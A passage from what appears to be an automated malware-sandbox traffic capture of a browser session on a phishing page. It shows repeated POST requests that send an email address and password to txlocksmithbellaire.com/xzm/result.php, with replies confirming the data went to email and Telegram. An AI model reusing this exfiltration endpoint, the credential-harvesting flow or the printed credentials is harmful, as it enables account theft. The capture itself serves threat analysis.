                                    Data Ascii: _<NE$O?uxbVx&)Md!@p]Zztj_>yxKL`:,hrRYscu=UVROKL5p1DrF4y?
                                    2025-01-23 07:05:35 UTC1086INData Raw: 34 33 37 0d 0a be 0d 29 06 87 06 d2 8a ca 81 53 8c f5 76 07 01 05 40 29 b6 b1 68 26 d3 15 9f 7f e9 f4 93 a7 67 42 ca 0c e4 d1 c7 5f 5f c3 e5 09 93 a5 43 b4 81 fb 99 87 86 1f bb 7b b5 f6 ad 78 39 92 00 cd c3 c7 40 b5 50 1f fe a7 bf f6 e2 c9 69 b1 39 88 b3 49 77 87 bf f1 af 3e b2 e3 9f be 67 7d a5 5a 6f 40 a9 13 ca c9 2f 42 80 e5 ba 9c dc cb bd fa d5 4f 7f eb df 7e 6b 66 c1 06 17 be c5 75 19 53 c1 94 cb c9 aa 38 62 55 50 02 60 06 fe 3f de de 03 da ae aa da 1b 9f ab ed 7d ce b9 e7 b6 dc dc 90 1e 42 7a 48 24 90 84 12 aa 80 74 69 a2 80 d8 11 0d 08 e2 c7 d3 bf d8 20 80 cf a1 a2 3c 78 a2 1f 9f 5d df 7b 34 91 26 25 80 20 48 93 1e 48 0f e9 ed a6 de 7a da de 7b ad 39 ff 63 cd 75 6e b8 20 57 e1 c1 70 0f 87 9a 76 cf 3e ab cc fa fb fd a6 2e 5f 7f c9 d1 5f 9a 37 be 49
                                    Data Ascii: 437)Sv@)h&gB__C{x9@Pi9Iw>g}Zo@/BO~kfuS8bUP`?}BzH$ti <x]{4&% HHz{9cun Wpv>.__7I
                                    2025-01-23 07:05:35 UTC10197INData Raw: 32 37 63 64 0d 0a e6 98 aa 6d d4 79 fe f1 e3 af 39 71 46 a3 b2 28 72 42 9a 80 71 aa b1 5c 88 a6 54 62 b5 cb ea 8b 6e 5f 7c eb d3 1d bb cc 08 8d 89 0b 53 04 29 13 12 9d cc b3 f2 88 62 ec 42 50 51 90 2d a2 fc b9 53 26 5e 79 fc 94 56 85 4a 18 92 b9 88 b2 aa 50 91 ff aa ca 0a 73 f4 f8 e6 8e ac ba 7e dd d6 cc 07 60 e9 60 1c 71 fc 7b 8e 78 14 e3 e0 1c f1 0d 26 b7 76 cd d6 81 1c 71 76 c8 38 18 47 7c f8 d8 b6 a9 6d 2d 6f e2 88 8b 3d 0d 07 d5 e4 ca 07 1f 30 b2 52 aa 10 c0 25 47 8e 14 e5 0c bb ca b6 ad d9 08 82 28 10 61 b0 5c 23 a8 aa 62 33 a0 b4 35 52 51 ea d4 0d 4f 2f ff fa cd 1b d9 a4 ea 50 b0 31 50 09 27 33 13 31 c7 f1 04 22 22 32 80 b4 77 b2 f8 cb a7 1f 7c e1 49 73 72 aa 52 91 c5 3c 11 eb bb 78 1f 52 a4 12 88 c8 92 76 52 ce bf 75 f1 6d 8f ad 4a 9c 90 8d 43 6c
                                    Data Ascii: 27cdmy9qF(rBq\Tbn_|S)bBPQ-S&^yVJPs~``q{x&vqv8G|m-o=0R%G(a\#b35RQO/P1P'31""2w|IsrR<xRvRumJCl
                                    2025-01-23 07:05:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.66491776.223.67.1894433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:35 UTC374OUTGET /wp-includes/images/banner.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:35 UTC121INHTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:35 UTC114INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.66492313.32.27.774433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:36 UTC351OUTGET /iprotex.de HTTP/1.1
                                    Host: logo.clearbit.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:36 UTC555INHTTP/1.1 200 OK
                                    Content-Type: image/png
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    Cache-Control: public, max-age=2592000
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    x-envoy-response-flags: -
                                    Server: Clearbit
                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                    x-content-type-options: nosniff
                                    X-Cache: Hit from cloudfront
                                    Via: 1.1 fdc45b521af7652438141328494a79d2.cloudfront.net (CloudFront)
                                    X-Amz-Cf-Pop: FRA56-C2
                                    X-Amz-Cf-Id: pMeyGAuhng5S8okOctIdrTPMqb26wOfOaCykRuiRoDgNNrKqhN--1w==
                                    Age: 1
                                    2025-01-23 07:05:36 UTC16384INData Raw: 36 61 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 6a 3b 49 44 41 54 78 9c b4 bd 79 98 5d c7 75 1f 78 ce a9 aa 7b df d2 fb 8a c6 d2 d8 bb b1 03 24 b8 88 24 48 4a a4 14 4a b2 6c cb 4b 22 59 72 1c 2f 93 d8 91 c7 63 fb 8f cc e2 d8 11 e5 cc 97 4c c6 76 c6 99 cc 24 93 4c 2c 7f b6 3c b6 24 8f 6c 6d d6 62 8a e2 be 13 fb be 2f 0d 74 03 e8 6e f4 fa de bb f7 56 d5 39 f3 55 dd 06 44 52 82 2c 8e 98 c7 fe 88 06 fa f5 ed 7b ab ce f2 fb 9d 73 7e d5 5a 44 e0 ff ff 4b 00 38 7e a2 ca bf 08 00 c6 bf e3 d2 57 31 8f ef a0 f8 a1 45 10 41 3c a3 c2 f8 d5 f0 5d 1e c0 01 24 00 e8 66 01 8d c3 d4 91 36 02 b3 4e ce 5e 9e 18 9f 9a 19 9b 6e 9c 9b f4 93 4d 7d 69 1e a6 17 1a b3 85 9f b2 15 6b ad 00 b6 f3 dc 5f fc d2
                                    Data Ascii: 6a74PNGIHDRL\j;IDATxy]ux{$$HJJlK"Yr/cLv$L,<$lmb/tnV9UDR,{s~ZDK8~W1EA<]$f6N^nM}ik_
                                    2025-01-23 07:05:36 UTC10876INData Raw: 4b 6b 4d d4 f3 ab 4f 4c 3b e7 b0 09 91 74 82 05 f1 03 0f 9a c1 0c da b0 53 5a 4f f2 fc 6b ef be 7d 85 06 95 83 3a 46 b1 9e eb 86 cd e7 98 47 86 5c d7 80 1b 11 d7 1e ff e6 b1 87 8c ce 17 64 4a 22 e7 7f 20 48 6e 83 51 ea 3d 4f 39 f3 6e b0 78 e5 c2 65 bf f9 f3 b6 8a 33 dc 75 f1 96 de fa f8 95 fc 7d da 33 19 c5 a2 6e 68 16 ae d6 9e 6c fa ea 87 67 5c 71 ea cc bc 80 82 a1 33 a6 0d cb fa 76 bf be a1 a3 46 c2 34 0c 49 6b 29 a9 08 85 19 8c 23 be 64 53 ef 46 2b 06 72 c4 41 9a 7f c0 11 af 89 42 80 a3 ed e1 88 87 65 7d 17 1c 71 2c 47 a2 ce 11 7f 79 ed 4e 9e 3a 20 ad 30 5f 98 d7 a6 be fa 8d 6f fd d7 f3 db 21 a9 e6 14 5d 73 ce 01 1f 39 62 9a 61 f6 0c ab 32 a0 62 df c2 99 11 39 90 5d 24 16 fc f6 b9 47 16 6d 4e a2 66 62 ac 36 0c 60 dd 4b 40 1f 89 bf 21 60 2d 86 50 f7 75
                                    Data Ascii: KkMOL;tSZOk}:FG\dJ" HnQ=O9nxe3u}3nhlg\q3vF4Ik)#dSF+rABe}q,GyN: 0_o!]s9ba2b9]$GmNfb6`K@!`-Pu
                                    2025-01-23 07:05:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10192.168.2.66498840.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:46 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 76 73 69 6d 56 64 4f 68 73 45 32 4a 42 4d 67 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 61 35 66 65 66 32 62 34 61 62 65 66 66 38 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: vsimVdOhsE2JBMgV.1Context: 11a5fef2b4abeff8
                                    2025-01-23 07:05:46 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:05:46 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 76 73 69 6d 56 64 4f 68 73 45 32 4a 42 4d 67 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 61 35 66 65 66 32 62 34 61 62 65 66 66 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 53 76 41 73 43 6f 6e 6a 51 46 55 32 55 57 36 38 33 33 6b 67 64 55 75 77 50 37 74 41 66 49 41 41 4b 4d 73 78 6d 63 49 58 57 69 64 7a 36 4a 39 34 64 6f 33 41 31 2f 67 65 67 6f 6b 34 5a 46 4c 65 37 42 36 35 62 4f 2b 7a 2f 61 36 74 43 37 55 59 53 6d 72 4f 4f 70 6a 42 37 61 43 77 4d 49 58 72 38 50 70 63 78 65 6b 65 51 2f 56 58
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: vsimVdOhsE2JBMgV.2Context: 11a5fef2b4abeff8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:05:46 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 76 73 69 6d 56 64 4f 68 73 45 32 4a 42 4d 67 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 61 35 66 65 66 32 62 34 61 62 65 66 66 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: vsimVdOhsE2JBMgV.3Context: 11a5fef2b4abeff8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:05:46 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:05:46 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 48 72 34 77 63 49 2f 30 55 53 68 45 32 30 41 51 44 76 6b 50 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: BHr4wcI/0UShE20AQDvkPg.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.664999184.168.29.584433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:48 UTC711OUTPOST /xzm/result.php HTTP/1.1
                                    Host: txlocksmithbellaire.com
                                    Connection: keep-alive
                                    Content-Length: 270
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAimUO6kSX1NJhj17
                                    Accept: */*
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:48 UTC270OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 69 6d 55 4f 36 6b 53 58 31 4e 4a 68 6a 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 0d 0a 0d 0a 6d 61 72 63 6f 2e 63 65 72 75 6c 6c 6f 40 69 70 72 6f 74 65 78 2e 64 65 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 69 6d 55 4f 36 6b 53 58 31 4e 4a 68 6a 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 78 2c 26 34 54 4b 37 74 50 32 5e 35 4b 5d 6c 23 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 69 6d 55 4f
                                    Data Ascii: ------WebKitFormBoundaryAimUO6kSX1NJhj17Content-Disposition: form-data; name="email"marco.cerullo@iprotex.de------WebKitFormBoundaryAimUO6kSX1NJhj17Content-Disposition: form-data; name="userpwd"x,&4TK7tP2^5K]l#------WebKitFormBoundaryAimUO
                                    2025-01-23 07:05:48 UTC204INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Thu, 23 Jan 2025 07:05:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Vary: Accept-Encoding
                                    2025-01-23 07:05:48 UTC104INData Raw: 35 64 0d 0a ef bb bf 7b 22 65 6d 61 69 6c 22 3a 22 45 6d 61 69 6c 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 74 65 6c 65 67 72 61 6d 22 3a 22 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 22 7d 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 5d{"email":"Email sent successfully.","telegram":"Form data sent to Telegram successfully!"}0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.665075184.168.29.584433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:59 UTC711OUTPOST /xzm/result.php HTTP/1.1
                                    Host: txlocksmithbellaire.com
                                    Connection: keep-alive
                                    Content-Length: 270
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4CAaggzo3yWeKexH
                                    Accept: */*
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:59 UTC270OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 34 43 41 61 67 67 7a 6f 33 79 57 65 4b 65 78 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 0d 0a 0d 0a 6d 61 72 63 6f 2e 63 65 72 75 6c 6c 6f 40 69 70 72 6f 74 65 78 2e 64 65 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 34 43 41 61 67 67 7a 6f 33 79 57 65 4b 65 78 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 78 2c 26 34 54 4b 37 74 50 32 5e 35 4b 5d 6c 23 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 34 43 41 61 67
                                    Data Ascii: ------WebKitFormBoundary4CAaggzo3yWeKexHContent-Disposition: form-data; name="email"marco.cerullo@iprotex.de------WebKitFormBoundary4CAaggzo3yWeKexHContent-Disposition: form-data; name="userpwd"x,&4TK7tP2^5K]l#------WebKitFormBoundary4CAag
                                    2025-01-23 07:06:00 UTC204INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Thu, 23 Jan 2025 07:06:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Vary: Accept-Encoding
                                    2025-01-23 07:06:00 UTC104INData Raw: 35 64 0d 0a ef bb bf 7b 22 65 6d 61 69 6c 22 3a 22 45 6d 61 69 6c 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 74 65 6c 65 67 72 61 6d 22 3a 22 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 22 7d 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 5d{"email":"Email sent successfully.","telegram":"Form data sent to Telegram successfully!"}0


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13192.168.2.66149240.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:06:06 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 51 38 56 32 67 69 30 44 45 32 67 70 34 42 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 64 36 36 35 35 37 61 37 36 37 65 63 32 37 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: EQ8V2gi0DE2gp4Bg.1Context: ead66557a767ec27
                                    2025-01-23 07:06:06 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:06:06 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 45 51 38 56 32 67 69 30 44 45 32 67 70 34 42 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 64 36 36 35 35 37 61 37 36 37 65 63 32 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 53 76 41 73 43 6f 6e 6a 51 46 55 32 55 57 36 38 33 33 6b 67 64 55 75 77 50 37 74 41 66 49 41 41 4b 4d 73 78 6d 63 49 58 57 69 64 7a 36 4a 39 34 64 6f 33 41 31 2f 67 65 67 6f 6b 34 5a 46 4c 65 37 42 36 35 62 4f 2b 7a 2f 61 36 74 43 37 55 59 53 6d 72 4f 4f 70 6a 42 37 61 43 77 4d 49 58 72 38 50 70 63 78 65 6b 65 51 2f 56 58
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: EQ8V2gi0DE2gp4Bg.2Context: ead66557a767ec27<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:06:06 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 45 51 38 56 32 67 69 30 44 45 32 67 70 34 42 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 64 36 36 35 35 37 61 37 36 37 65 63 32 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: EQ8V2gi0DE2gp4Bg.3Context: ead66557a767ec27<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:06:06 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:06:06 UTC58INData Raw: 4d 53 2d 43 56 3a 20 58 4d 62 62 50 4f 6c 62 2f 30 47 73 68 61 54 57 38 61 7a 6f 67 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: XMbbPOlb/0GshaTW8azogg.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.661506184.168.29.584433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:06:08 UTC711OUTPOST /xzm/result.php HTTP/1.1
                                    Host: txlocksmithbellaire.com
                                    Connection: keep-alive
                                    Content-Length: 270
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryickg9CiXUT7NL2Av
                                    Accept: */*
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
